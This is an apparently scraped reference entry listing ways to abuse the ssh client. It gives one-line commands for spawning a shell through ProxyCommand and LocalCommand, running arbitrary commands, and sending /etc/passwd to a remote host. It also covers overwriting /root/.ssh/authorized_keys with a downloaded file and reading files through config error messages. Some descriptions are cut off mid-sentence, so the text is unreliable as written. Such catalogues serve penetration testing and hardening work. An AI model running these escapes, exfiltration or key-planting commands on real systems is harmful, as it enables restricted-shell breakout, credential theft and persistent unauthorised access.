It can be used to break out from restricted environments by spawning an interactive system shell.
Spawn interactive shell on client. Does not require a successful connection.
ssh -o ProxyCommand=';sh 0<&2 1>&2' host
Spawn interactive shell on client. Requires a successful connection towards
ssh -o PermitLocalCommand=yes -o LocalCommand=/bin/sh host
It can be used to break out from the intended program by running non-interactive system commands.
Does not require a successful connection.
ssh -o ProxyCommand=';uname -a 1>&2' host
It can exfiltrate files on the network.
Sends a local file (
/etc/passwd) to a remote SSH server and saves it in a location (
ssh host "cat /tmp/out" < /etc/passwd
It can download remote files.
Retrieves a remote file from an SSH server (
/tmp/infile) and saves it to a local destination (
ssh host "cat /tmp/infile" > /root/.ssh/authorized_keys
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
Reads a file and outputs it in an error message.
ssh -F /etc/passwd host